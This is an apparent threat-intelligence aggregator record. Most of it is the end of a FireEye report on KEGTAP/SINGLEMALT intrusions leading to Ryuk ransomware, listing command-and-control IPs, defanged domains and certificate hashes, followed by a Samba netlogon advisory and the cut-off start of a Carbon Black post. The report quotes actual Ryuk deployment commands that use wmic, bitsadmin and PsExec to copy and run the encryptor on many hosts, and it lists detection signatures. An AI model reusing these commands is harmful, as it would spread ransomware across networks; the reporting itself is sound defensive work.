\n\nc8fd81d6d3c8cbb8256c470a613a7c7b \n \n9/23/20\n\n| \n\n193.142.58.129:443\n\n| \n\nC=US,ST=TX,L=Texas,O=zapored,OU=,CN=zapored[.]com\n\n| \n\n5a22c3c8a0ed6482cad0e2b867c4c10c \n \n9/23/20\n\n| \n\n45.34.6.223:443\n\n| \n\nC=US,ST=TX,L=Texas,O=office,OU=,CN=hurrypotter[.]com\n\n| \n\nbf598ba46f47919c264514f10ce80e34 \n \n9/23/20\n\n| \n\n107.173.58.179:443\n\n| \n\nC=US,ST=TX,L=Texas,O=office,OU=,CN=biliyilish[.]com\n\n| \n\n1c8243e2787421373efcf98fc0975031 \n \n9/23/20\n\n| \n\n45.34.6.222:443\n\n| \n\nC=US,ST=TX,L=Texas,O=dagger,OU=,CN=daggerclip[.]com\n\n| \n\n576d65a68900b270155c2015ac4788bb \n \n9/23/20\n\n| \n\n107.173.58.180:443\n\n| \n\nC=US,ST=TX,L=Texas,O=office,OU=,CN=blackhoall[.]com\n\n| \n\n69643e9b1528efc6ec9037b60498b94c \n \n9/23/20\n\n| \n\n107.173.58.182:443\n\n| \n\nC=US,ST=TX,L=Texas,O=office,OU=,CN=checkhunterr[.]com\n\n| \n\nca9b7e2fcfd35f19917184ad2f5e1ad3 \n \n9/23/20\n\n| \n\n45.34.6.221:443\n\n| \n\nC=US,ST=TX,L=Texas,O=office,OU=,CN=check4list[.]com\n\n| \n\ne5e0f017b00af6f020a28b101a136bad \n \n9/24/20\n\n| \n\n213.252.244.62:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=ayiyas[.]com\n\n| \n\n8367a1407ae999644f25f665320a3899 \n \n9/24/20\n\n| \n\n185.25.50.167:443\n\n| \n\nC=US,ST=TX,L=Texas,O=office,OU=,CN=chainnss[.]com\n\n| \n\n34a78f1233e53010d29f2a4fa944c877 \n \n9/30/20\n\n| \n\n88.119.171.75:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=martahzz[.]com\n\n| \n\neaebbe5a3e3ea1d5992a4dfd4af7a749 \n \n10/1/20\n\n| \n\n88.119.171.74:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=jonsonsbabyy[.]com\n\n| \n\nadc8cd1285b7ae62045479ed39aa37f5 \n \n10/1/20\n\n| \n\n88.119.171.55:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=tiancaii[.]com\n\n| \n\nbfe1fd16cd4169076f3fbaab5afcbe12 \n \n10/1/20\n\n| \n\n88.119.171.67:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=cantliee[.]com\n\n| \n\nc8a623eb355d172fc3e083763934a7f7 \n \n10/1/20\n\n| \n\n88.119.171.76:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=realgamess[.]com\n\n| \n\n0ac5659596008e64d4d0d90dfb6abe7c \n \n10/1/20\n\n| \n\n88.119.171.68:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=maybebaybe[.]com\n\n| \n\n48003b6b638dc7e79e75a581c58f2d77 \n \n10/1/20\n\n| \n\n88.119.171.69:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=saynoforbubble[.]com\n\n| \n\n5c75a6bbb7454a04b9ea26aa80dfbcba \n \n10/1/20\n\n| \n\n88.119.171.73:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=chekingking[.]com\n\n| \n\ne391c997b757424d8b2399cba4733a60 \n \n10/1/20\n\n| \n\n88.119.171.77:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=wondergodst[.]com\n\n| \n\n035697cac0ee92bb4d743470206bfe9a \n \n10/1/20\n\n| \n\n88.119.171.78:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=zetrexx[.]com\n\n| \n\nfc133bed713608f78f9f112ed7498f32 \n \n10/1/20\n\n| \n\n213.252.244.38:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=mountasd[.]com\n\n| \n\n8ead6021e2a5b9191577c115d4e68911 \n \n10/1/20\n\n| \n\n107.173.58.184:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=pudgeee[.]com\n\n| \n\n1c9949d20441df2df09d13778b751b65 \n \n10/1/20\n\n| \n\n88.119.174.109:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=loockfinderrs[.]com\n\n| \n\nc0ddfc954aa007885b467f8c4f70ad75 \n \n10/1/20\n\n| \n\n88.119.174.110:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=puckhunterrr[.]com\n\n| \n\nee63098506cb82fc71a4e85043d4763f \n \n10/1/20\n\n| \n\n88.119.174.114:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=voiddas[.]com\n\n| \n\n422b020be24b346da826172e4a2cf1c1 \n \n10/1/20\n\n| \n\n88.119.174.116:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=sibalsakie[.]com\n\n| \n\n8d8f046e963bcd008fe4bbed01bed4c8 \n \n10/1/20\n\n| \n\n88.119.174.117:443\n\n| \n\nC=US,ST=TX,L=TExas,O=lol,OU=,CN=rapirasa[.]com\n\n| \n\nc381fb63e9cb6b0fc59dfaf6e8c40af3 \n \n10/1/20\n\n| \n\n88.119.174.118:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=raidbossa[.]com\n\n| \n\nadd6b742d0f992d56bede79888eef413 \n \n10/1/20\n\n| \n\n88.119.174.119:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=lindasak[.]com\n\n| \n\n9bbd073033e34bfd80f658f0264f6fae \n \n10/1/20\n\n| \n\n88.119.174.121:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=bithunterr[.]com\n\n| \n\n9afef617897e7089f59c19096b8436c8 \n \n10/1/20\n\n| \n\n88.119.174.120:443\n\n| \n\nC=US,ST=TX,L=Texas,O=office,OU=,CN=giveasees[.]com\n\n| \n\n3f366e5f804515ff982c151a84f6a562 \n \n10/1/20\n\n| \n\n88.119.174.107:443\n\n| \n\nC=US,ST=TX,L=Texas,O=office,OU=,CN=shabihere[.]com\n\n| \n\nc2f99054e0b42363be915237cb4c950b \n \n10/1/20\n\n| \n\n88.119.174.125:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=tarhungangster[.]com\n\n| \n\n4ac8ac12f1763277e35da08d8b9ea394 \n \n10/1/20\n\n| \n\n88.119.174.126:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=imagodd[.]com\n\n| \n\n7080547306dceb90d809cb9866ed033c \n \n10/1/20\n\n| \n\n88.119.174.127:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=raaidboss[.]com\n\n| \n\n03037dff61500d52a37efd4b4f520518 \n \n10/1/20\n\n| \n\n88.119.174.128:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=sunofgodd[.]com\n\n| \n\n959bed7a2662d7274b303f3b120fddea \n \n10/1/20\n\n| \n\n213.252.244.126:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=hungrrybaby[.]com\n\n| \n\n1d28556cc80df9627c20316358b625d6 \n \n10/1/20\n\n| \n\n213.252.244.170:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=loxliver[.]com\n\n| \n\n85e65803443046f921b9a0a9b8cc277c \n \n10/1/20\n\n| \n\n213.252.246.154:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=servicegungster[.]com\n\n| \n\n9df6ba82461aa0594ead03993c0e4c42 \n \n10/5/20\n\n| \n\n5.2.64.113:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=qascker[.]com\n\n| \n\n18aadee1b82482c3cd5ebe32f3628f3f \n \n10/7/20\n\n| \n\n5.2.79.122:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=cheapshhot[.]com\n\n| \n\n94bc44bd438d2e290516d111782badde \n \n10/7/20\n\n| \n\n88.119.171.94:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=havemosts[.]com\n\n| \n\nf0ede92cb0899a9810a67d716cdbebe2 \n \n10/7/20\n\n| \n\n5.2.64.133:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=mixunderax[.]com\n\n| \n\ne0f9efedd11d22a5a08ffb9c4c2cbb5a \n \n10/7/20\n\n| \n\n5.2.64.135:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=bugsbunnyy[.]com\n\n| \n\n4aa2acabeb3ff38e39ed1d840124f108 \n \n10/7/20\n\n| \n\n5.2.72.202:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=sweetmonsterr[.]com\n\n| \n\nc04034b78012cca7dcc4a0fb5d7bb551 \n \n10/7/20\n\n| \n\n88.119.175.153:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=zhameharden[.]com\n\n| \n\n2670bf08c43d995c74b4b83383af6a69 \n \n10/7/20\n\n| \n\n213.252.245.71:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceboosterr[.]com\n\n| \n\n127cc347b711610c3bcee434eb8bf822 \n \n10/7/20\n\n| \n\n213.252.246.144:443\n\n| \n\nC=US,ST=TX,L=Texas,O=US,OU=,CN=servicewikii[.]com\n\n| \n\nb3e7ab478ffb0213017d57a88e7b2e3b \n \n10/7/20\n\n| \n\n5.2.64.149:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=sobcase[.]com\n\n| \n\n188f603570e7fa81b92906af7af177dc \n \n10/7/20\n\n| \n\n5.2.64.144:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=unlockwsa[.]com\n\n| \n\n22d7f35e624b7bcee7bb78ee85a7945c \n \n10/7/20\n\n| \n\n88.119.174.139:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceupdatter[.]com\n\n| \n\n12c6e173fa3cc11cc6b09b01c5f71b0c \n \n10/7/20\n\n| \n\n88.119.174.133:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=service-boosterr[.]com\n\n| \n\n28435684c76eb5f1c4b48b6bbc4b22af \n \n10/7/20\n\n| \n\n88.119.175.214:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=dotmaingame[.]com\n\n| \n\n9c2d64cf4e8e58ef86d16e9f77873327 \n \n10/7/20\n\n| \n\n5.2.72.200:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=wodemayaa[.]com\n\n| \n\nf6f484baf1331abf55d06720de827190 \n \n10/7/20\n\n| \n\n5.2.79.10:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=hybriqdjs[.]com\n\n| \n\nd8eacda158594331aec3ad5e42656e35 \n \n10/7/20\n\n| \n\n5.2.79.12:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=gunsdrag[.]com\n\n| \n\n29032dd12ea17fc37ffff1ee94cc5ba8 \n \n10/7/20\n\n| \n\n5.2.79.121:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=gungameon[.]com\n\n| \n\neaf32b1c2e31e4e7b6d5c3e6ed6bff3d \n \n10/7/20\n\n| \n\n5.2.64.174:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=quwasd[.]com\n\n| \n\n442680006c191692fcc3df64ec60d8fa \n \n10/7/20\n\n| \n\n5.2.64.172:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=remotessa[.]com\n\n| \n\n0593cbf6b3a3736a17cd64170e02a78d \n \n10/7/20\n\n| \n\n5.2.64.167:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=secondlivve[.]com\n\n| \n\n38df81824bd8cded4a8fa7ad9e4d1f67 \n \n10/7/20\n\n| \n\n5.2.64.182:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=luckyhunterrs[.]com\n\n| \n\n99dbe71ca7b9d4a1d9f722c733b3f405 \n \n10/7/20\n\n| \n\n88.119.171.97:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=servicesupdater[.]com\n\n| \n\n7d7199ffa40c50b6e5b025b8cb2661b2 \n \n10/7/20\n\n| \n\n88.119.171.96:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=servicemount[.]com\n\n| \n\nf433d25a0dad0def0510cd9f95886fdb \n \n10/7/20\n\n| \n\n96.9.209.217:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=fastbloodhunter[.]com\n\n| \n\ne84c7aa593233250efac903c19f3f589 \n \n10/7/20\n\n| \n\n69.61.38.132:443\n\n| \n\nC=US,ST=CA,L=Mountainvew,O=Office,OU=,CN=kungfupandasa[.]com\n\n| \n\ne6e80f6eb5cbfc73cde40819007dcc53 \n \n10/13/20\n\n| \n\n45.147.230.131:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-monster[.]com\n\n| \n\n4fdeab3dad077589d52684d35a9ea4ab \n \n10/13/20\n\n| \n\n45.147.229.92:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-checker[.]com\n\n| \n\nb70cdb49b26e6e9ba7d0c42d5f3ed3cb \n \n10/13/20\n\n| \n\n45.147.229.68:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-simple[.]com\n\n| \n\n57024c1fe5c4acaf30434ba1f58f9144 \n \n10/13/20\n\n| \n\n45.147.229.52:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-leader[.]com\n\n| \n\nec5496048f1962494d239d377e53db0c \n \n10/13/20\n\n| \n\n45.147.229.44:443\n\n| \n\nC=US,ST=TX,L=Texsa,O=lol,OU=,CN=backup-helper[.]com\n\n| \n\n938593ac1c8bdb2c5256540d7c8476c8 \n \n10/14/20\n\n| \n\n45.147.230.87:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=nasmastrservice[.]com\n\n| \n\ncced46e0a9b6c382a97607beb95f68ab \n \n10/14/20\n\n| \n\n45.147.230.159:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com\n\n| \n\ne912980fc8e9ec1e570e209ebb163f65 \n \n10/14/20\n\n| \n\n45.147.230.141:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com\n\n| \n\n39d7160ce331a157d3ecb2a9f8a66f12 \n \n10/14/20\n\n| \n\n45.147.230.140:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com\n\n| \n\nd9ca73fe10d52eef6952325d102f0138 \n \n10/14/20\n\n| \n\n45.147.230.133:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com\n\n| \n\n920d04330a165882c8076c07b00e1d93 \n \n10/14/20\n\n| \n\n45.147.230.132:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com\n\n| \n\n771463611a43ee35a0ce0631ef244dee \n \n10/14/20\n\n| \n\n45.147.229.180:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=elephantdrrive[.]com\n\n| \n\n1e4a794da7d3c6d0677f7169fbe3b526 \n \n10/14/20\n\n| \n\n45.147.230.159:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com\n\n| \n\n9c7fe10135f6ad96ded28fac51b79dfd \n \n10/15/20\n\n| \n\n45.147.230.132:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com\n\n| \n\na78c0e2920e421667ae734d923dd5ca6 \n \n10/15/20\n\n| \n\n45.138.172.95:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hellper[.]com\n\n| \n\na0b2378ceae498f46401aadeb278fb31 \n \n10/16/20\n\n| \n\n108.62.12.119:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backuphelper[.]com\n\n| \n\ne95bb7804e3add830496bd36664ed339 \n \n10/16/20\n\n| \n\n108.62.12.105:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=best-nas[.]com\n\n| \n\n8d5dc95b3bd4d16a3434b991a09bf77e \n \n10/16/20\n\n| \n\n108.62.12.114:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backupservice[.]com\n\n| \n\nd5de2f5d2ca29da1724735cdb8fbc63f \n \n10/16/20\n\n| \n\n108.62.12.116:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=bestservicehelper[.]com\n\n| \n\n9c7396ecd107ee8f8bf5521afabb0084 \n \n10/16/20\n\n| \n\n45.147.230.141:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com\n\n| \n\n1134a6f276f4297a083fc2a605e24f70 \n \n10/16/20\n\n| \n\n45.147.230.140:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com\n\n| \n\n2150045f476508f89d9a322561b28ff9 \n \n10/16/20\n\n| \n\n45.147.230.133:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com\n\n| \n\nf4ddc4562e5001ac8fdf0b7de079b344 \n \n10/19/20\n\n| \n\n74.118.138.137:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=top3-services[.]com\n\n| \n\n75fb6789ec03961c869b52336fa4e085 \n \n10/19/20\n\n| \n\n74.118.138.115:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=simple-backupbooster[.]com\n\n| \n\n9f5e845091015b533b59fe5e8536a435 \n \n10/19/20\n\n| \n\n108.177.235.53:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=best-backup[.]com\n\n| \n\n4b78eaa4f2748df27ebf6655ea8a7fe9 \n \n10/19/20\n\n| \n\n74.118.138.138:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackup-helper[.]com\n\n| \n\nbcccda483753c82e62482c55bc743c16 \n \n10/21/20\n\n| \n\n45.153.241.1:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1helper[.]com\n\n| \n\n672c66dd4bb62047bb836bd89d2e1a65 \n \n10/21/20\n\n| \n\n45.153.240.240:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=checktodrivers[.]com\n\n| \n\n6825409698a326cc319ca40cd85a602e \n \n10/21/20\n\n| \n\n45.153.240.194:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1master[.]com\n\n| \n\n7f9be0302da88e0d322e5701d52d4128 \n \n10/21/20\n\n| \n\n45.153.240.138:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-yourservice[.]com\n\n| \n\n2c6a0856d1a75b303337ac0807429e88 \n \n10/21/20\n\n| \n\n45.153.240.136:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1master[.]com\n\n| \n\n6559dbf8c47383b7b493500d7ed76f6a \n \n10/23/20\n\n| \n\n45.153.240.157:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1updater[.]com\n\n| \n\n7bd044e0a6689ef29ce23e3ccb0736a3 \n \n10/23/20\n\n| \n\n45.153.240.178:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=service1updater[.]com\n\n| \n\n9859a8336d097bc30e6e5c7a8279f18e \n \n10/23/20\n\n| \n\n45.153.240.220:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=driverdwl[.]com\n\n| \n\n43fb2c153b59bf46cf6f67e0ddd6ef51 \n \n10/23/20\n\n| \n\n45.153.240.222:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=viewdrivers[.]com\n\n| \n\n22bafb30cc3adaa84fef747d589ab235 \n \n10/23/20\n\n| \n\n45.153.241.134:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=backups1helper[.]com\n\n| \n\n31e87ba0c90bb38b986af297e4905e00 \n \n10/23/20\n\n| \n\n45.153.241.138:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1downloads[.]com\n\n| \n\nf8a14846b7da416b14303bced5a6418f \n \n10/23/20\n\n| \n\n45.153.241.146:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=servicehel[.]com\n\n| \n\n01abdaf870d859f9c1fd76f0b0328a2b \n \n10/23/20\n\n| \n\n45.153.241.153:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hel[.]com\n\n| \n\nc2eaf144e21f3aef5fe4b1502d318ba6 \n \n10/23/20\n\n| \n\n45.153.241.158:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=servicereader[.]com\n\n| \n\nde54af391602f3deea19cd5e1e912316 \n \n10/23/20\n\n| \n\n45.153.241.167:443\n\n| \n\nC=US,ST=TX,L=Texas,O=US,OU=,CN=view-backup[.]com\n\n| \n\n5f6fa19ffe5735ff81b0e7981a864dc8 \n \n10/23/20\n\n| \n\n45.147.231.222:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=top3servicebooster[.]com\n\n| \n\nff54a7e6f51a850ef1d744d06d8e6caa \n \n10/23/20\n\n| \n\n45.153.241.141:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=service1view[.]com\n\n| \n\n4cda9d0bece4f6156a80967298455bd5 \n \n10/26/20\n\n| \n\n74.118.138.139:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackupintheworld[.]com\n\n| \n\ne317485d700bf5e8cb8eea1ec6a72a1a \n \n10/26/20\n\n| \n\n108.62.12.12:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=topservice-masters[.]com\n\n| \n\ne0022cbf0dd5aa597fee73e79d2b5023 \n \n10/26/20\n\n| \n\n108.62.12.121:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=topservicebooster[.]com\n\n| \n\n44e7347a522b22cdf5de658a4237ce58 \n \n10/26/20\n\n| \n\n172.241.27.65:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1services[.]com\n\n| \n\ncd3e51ee538610879d6fa77fa281bc6f \n \n10/26/20\n\n| \n\n172.241.27.68:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmaster-service[.]com\n\n| \n\n04b6aec529b3656040a68e17afdabfa4 \n \n10/26/20\n\n| \n\n172.241.27.70:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmasterservice[.]com\n\n| \n\n200c25c2b93203392e1acf5d975d6544 \n \n10/26/20\n\n| \n\n45.153.241.139:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=driver-boosters[.]com\n\n| \n\n9d7c52c79f3825baf97d1318bae3ebe2 \n \n10/27/20\n\n| \n\n45.153.241.14:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=service1update[.]com\n\n| \n\n5bae28b0d0e969af2c0eda21abe91f35 \n \n10/28/20\n\n| \n\n190.211.254.154:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=driverjumper[.]com\n\n| \n\na1e62e7e547532831d0dd07832f61f54 \n \n10/28/20\n\n| \n\n81.17.28.70:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=service1boost[.]com\n\n| \n\n67c7c75d396988ba7d6cd36f35def3e4 \n \n10/28/20\n\n| \n\n81.17.28.105:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivehepler[.]com\n\n| \n\n880e59b44e7175e62d75128accedb221 \n \n10/28/20\n\n| \n\n179.43.160.205:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedownload[.]com\n\n| \n\ncdea09a43bef7f1679e9cd1bbeb4b657 \n \n10/28/20\n\n| \n\n179.43.158.171:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivefinder[.]com\n\n| \n\n512c6e39bf03a4240f5a2d32ee710ce5 \n \n10/28/20\n\n| \n\n179.43.133.44:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedwn[.]com\n\n| \n\n87f3698c743f8a1296babf9fbebafa9f \n \n10/28/20\n\n| \n\n179.43.128.5:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivecheck[.]com\n\n| \n\n6df66077378c5943453b36bd3a1ed105 \n \n10/28/20\n\n| \n\n179.43.128.3:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveupdate[.]com\n\n| \n\n9706fd787a32a7e94915f91124de3ad3 \n \n10/28/20\n\n| \n\n81.17.28.122:443\n\n| \n\nC=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveview[.]com\n\n| \n\n0e1b0266de2b5eaf427f5915086b4d7c \n \n_RYUK Commands_\n\nstart wmic /node:@C:\\share$\\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create \"cmd.exe /c bitsadmin /transfer vVv \\\\\\\\[REDACTED]\\share$\\vVv.exe %APPDATA%\\vVv.exe &amp; %APPDATA%\\vVv.exe\"\n\nstart PsExec.exe /accepteula @C:\\share$\\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY \"\\\\\\\\[REDACTED]\\share$\\vVv.exe\" \"C:\\windows\\temp\\vVv.exe\"\n\nstart PsExec.exe -d @C:\\share$\\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\\windows\\temp\\vVv.exe \n \n--- \n \n#### Detecting the Techniques\n\nFireEye detects this activity across our platforms. The following table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.\n\n**Platform**\n\n| \n\n**Signature Name** \n \n---|--- \n \nEndpoint Security\n\n| \n\n * KEGTAP INTERACTIVE CMD.EXE CHILD PROCESS (BACKDOOR)\n * KEGTAP DLL EXECUTION VIA RUNDLL32.EXE (BACKDOOR)\n * SINGLEMALT (DOWNLOADER)\n * STILLBOT (BACKDOOR)\n * WINEKEY (DOWNLOADER)\n * CORKBOT (BACKDOOR)\n * RYUK RANSOMWARE ENCRYPT COMMAND (FAMILY)\n * RYUK RANSOMWARE SETUP EXECUTION (FAMILY)\n * RYUK RANSOMWARE WAKE-ON-LAN EXECUTION (FAMILY)\n * RYUK RANSOMWARE STAGED ENCRYPTOR INTERNAL TRANSFER TARGET (UTILITY)\n * RYUK RANSOMWARE ENCRYPTOR DISTRIBUTION SCRIPT CREATION (UTILITY)\n * RYUK RANSOMWARE STAGED ENCRYPTOR INTERNAL TRANSFER SOURCE (UTILITY) \n \nNetwork Security and Email Security\n\n| \n\n * Downloader.Win.KEGTAP\n * Trojan.KEGTAP\n * APTFIN.Backdoor.Win.BEERBOT\n * APTFIN.Downloader.Win.SINGLEMALT\n * APTFIN.Backdoor.Win.STILLBOT\n * APTFIN.Downloader.Win.WINEKEY\n * APTFIN.Backdoor.Win.CORKBOT\n * FE_Downloader_Win64_KEGTAP\n * FE_APTFIN_Backdoor_Win32_BEERBOT\n * FE_APTFIN_Backdoor_Win_BEERBOT\n * FE_APTFIN_Downloader_Win32_SINGLEMALT\n * FE_APTFIN_Downloader_Win64_SINGLEMALT\n * FE_APTFIN_Backdoor_Win_STILLBOT\n * FE_APTFIN_Downloader_Win_WINEKEY\n * FE_APTFIN_Backdoor_Win_CORKBOT\n", "modified": "2020-10-28T22:00:00", "published": "2020-10-28T22:00:00", "id": "FIREEYE:D64714BFF80E34308579150D4C839557", "href": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "type": "fireeye", "title": "Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2020-09-20T04:41:36", "bulletinFamily": "unix", "cvelist": ["CVE-2020-1472"], "description": "\nThe Samba Team reports:\n\nAn unauthenticated attacker on the network can gain\n\t administrator access by exploiting a netlogon protocol flaw.\n\n", "edition": 1, "modified": "2020-01-01T00:00:00", "published": "2020-01-01T00:00:00", "id": "24ACE516-FAD7-11EA-8D8C-005056A311D1", "href": "https://vuxml.freebsd.org/freebsd/24ace516-fad7-11ea-8d8c-005056a311d1.html", "title": "samba -- Unauthenticated domain takeover via netlogon", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "carbonblack": [{"lastseen": "2020-11-12T16:22:11", "bulletinFamily": "blog", "cvelist": ["CVE-2020-1472"], "description": "With this week\u2019s release on the VMware Carbon Black Cloud, users can now remotely inspect Windows devices\u2019 event logs to pull back information that could be helpful during an investigation or response scenario.\n\nThis new capability comes as part of an update to the Live Query functionality provided on the platform. Unlike standard EDR search capabilities, which allow administrators to review previously collected data about activity on devices, Live Query allows you to reach out and directly gather information about the current state of a single device or your entire fleet of 